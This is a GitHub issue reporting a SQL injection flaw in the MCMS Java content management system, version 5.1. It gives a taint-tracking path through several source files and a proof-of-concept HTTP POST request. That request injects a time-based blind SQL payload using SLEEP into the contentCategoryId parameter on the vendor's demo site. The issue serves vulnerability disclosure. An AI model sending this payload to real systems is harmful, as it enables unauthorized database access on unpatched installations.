search

ming-soft / MCMS

完整开源!Java快速开发平台!基于Spring、SpringMVC、Mybatis架构,MStore提供更多好用的插件与模板(文章、商城、微信、论坛、会员、评论、支付、积分、工作流、任务调度等,同时提供上百套免费模板任意选择),价值源自分享!铭飞系统不仅一套简单好用的开源系统、更是一整套优质的开源生态内容体系。铭飞的使命就是降低开发成本提高开发效率,提供全方位的企业级开发解决方案,每月28定期更新版本
http://www.mingsoft.net
MIT License
1.49k stars 662 forks source link

MCMS V5.1 /src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java hava a SQL Injection Vulnerability #58

Closed chauncyman closed 2 years ago

chauncyman commented 2 years ago

Vulnerability file:

/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java

Vulnerability tracking path:

1. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行  --The return value of call queryChildren() is tained
2. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/CategoryBizImpl.java:72行  --Tainted value is returned
3. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行  --The return value of call
queryChildren() is tained
4. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:168行  --Tainted value is assigned to variable columns
5. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value enters call iterator() from the this argument, then taints the return value
6. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value is assigned to variable column~iterator
7.  MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value enters call next() from the this argument, then taints the return value
8. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:175行  --Tainted value is assigned to variable column
9. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行  --Tainted value enters call getId() from the this argument, then taints the return value
10. MCMS-master/src/main/java/net/mingsoft/cms/entity/CategoryEntity.java:52行  --Tainted variable this.id is returned
11. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:181行  --Tainted value enters call setCategoryId() from the 1st argument, then taints the this argument
12. MCMS-master/src/main/java/net/mingsoft/cms/entity/ContentEntity.java:148行  --Tainted value is assigned to variable this.categoryId
13. MCMS-master/src/main/java/net/mingsoft/cms/action/GeneraterAction.java:183行  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
14. MCMS-master/src/main/java/net/mingsoft/cms/biz/impl/ContentBizImpl.java:77行  --Tainted value enters call queryIdsByCategoryIdForParser() from the 1st argument
15. MCMS-master/src/main/java/net/mingsoft/cms/dao/IContentDao.xml:253行  --categoryId

The risk of SQLI type is triggered, caused by the input parameter categoryId, value: image

poc

POST /ms/cms/content/list.do HTTP/1.1
Host: cms.demo.mingsoft.net
Content-Length: 21
Pragma: no-cache
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: http://cms.demo.mingsoft.net
Referer: http://cms.demo.mingsoft.net/ms/cms/category/form.do?id=158&childId=undefined
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ****
Connection: close

contentCategoryId=158'||(SELECT 0x7155656f WHERE 5755=5755 AND (SELECT 1979 FROM (SELECT(SLEEP(5)))dYQF))||'

image

image image